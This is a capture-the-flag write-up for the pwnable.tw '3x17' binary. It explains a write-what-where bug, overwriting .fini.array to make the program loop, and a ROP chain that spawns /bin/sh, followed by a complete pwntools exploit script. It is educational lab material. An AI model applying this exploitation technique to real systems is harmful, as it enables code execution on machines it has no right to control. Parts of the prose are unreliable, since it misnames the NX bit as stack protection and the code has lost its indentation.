Its_just_a_b4by_c4ll_0riented_Pr0gramm1ng_in_3xit

This is the first post from a long series on vulnerability research and techniques for exploit dev

out target todat:3x17 from pwntable.tw

ahamahamaham this blog is based  on v1cky's blog(https://v1ckydxp.github.io/2019/04/26/pwnable-tw-3x17-writeup/)

Now withdouth further a do,ladies and gentalmen let's get started

First things this 

Binary information gathering

One of the first things when investigating a CTF task and more even if it's a pwn one,we need to check for some mitigations.This can be achived by using checksec util.

Upon runnning checksec we get back that the binary is stack protected(NX bit set) and the fact that ther are no other mitigations. NX bit will not be a problem,cause we can bypass it using ROP(return oriented programming)

Reverse Engineering the binary

Upon inspecting main function we see there is no vulnerability,just a "feature" we can write any address anything we want.So we have a write-what-where primitive.But now how can we get RCE?

RCE

Now this is similar to some challenge from hitcon.The author of this challenged wanted this challenge to be solved in a specific way.Now the way we are supposed to solve this challenge is by overwriting  call.fini.array array. call.fini.array array is an array  which holds the function executed after the execution of the program ends.Now if we can overwrite it when the binary finishes normal execution,we can get RCE.One more thing to note is that.fini.array the functions saved in the array are executed in reverse order, first first.fini.array[1] and then execute fini.array[0].We can change value of array[1] to the address of the main function than the.fini.array[0] to 0x402960,so that after the execution of main execution ends to  continue to execute the function that calls the main function(0x402960).This allows the formation of a loop has been arbitrary address overwrite.From there we just crash a /bin/sh ROP chain.

here is the exploit:

# -*- coding: utf-8 -*-

from pwn import *

#p = remote('chall.pwnable.tw',10105)

p = process('./3x17')

def send_data(addr,data):

p.recvuntil('addr:')

p.sendline(str(addr))

p.recvuntil('data:')

p.send(data)

def pwn():

fini_array_addr = 0x00000000004B40F0

main_addr = 0x0000000000401B6D

loop_func_addr = 0x0000000000402960

main_leave_ret_addr = 0x0000000000401C4B

#change .fini.array[1] = main_addr,.fini.array[0] = loop_func_addr

send_data(fini_array_addr,p64(loop_func_addr)+p64(main_addr))

print 'change .fini.array'

#rop

pop_eax_addr = 0x000000000041e4af

pop_edi_addr = 0x0000000000401696

pop_esi_addr = 0x0000000000406c30

pop_edx_addr = 0x0000000000446e35

syscall_addr = 0x0000000000471db5

binsh_addr = 0x00000000004B4080

start_addr = 0x00000000004B4100

sys_read_addr = 0x0000000000446E2C

send_data(start_addr,p64(pop_eax_addr)+p64(0x3b))

send_data(start_addr+16,p64(pop_edi_addr)+p64(binsh_addr))

send_data(binsh_addr,"/bin/sh\x00")

send_data(start_addr+32,p64(pop_esi_addr)+p64(0))

send_data(start_addr+48,p64(pop_edx_addr)+p64(0))

send_data(start_addr+64,p64(syscall_addr))

send_data(fini_array_addr,p64(main_leave_ret_addr)) #this is required to overwrite first entry in the array to break

#from infinit loop to ret to fini array ->/bin/sh

p.interactive()

pwn()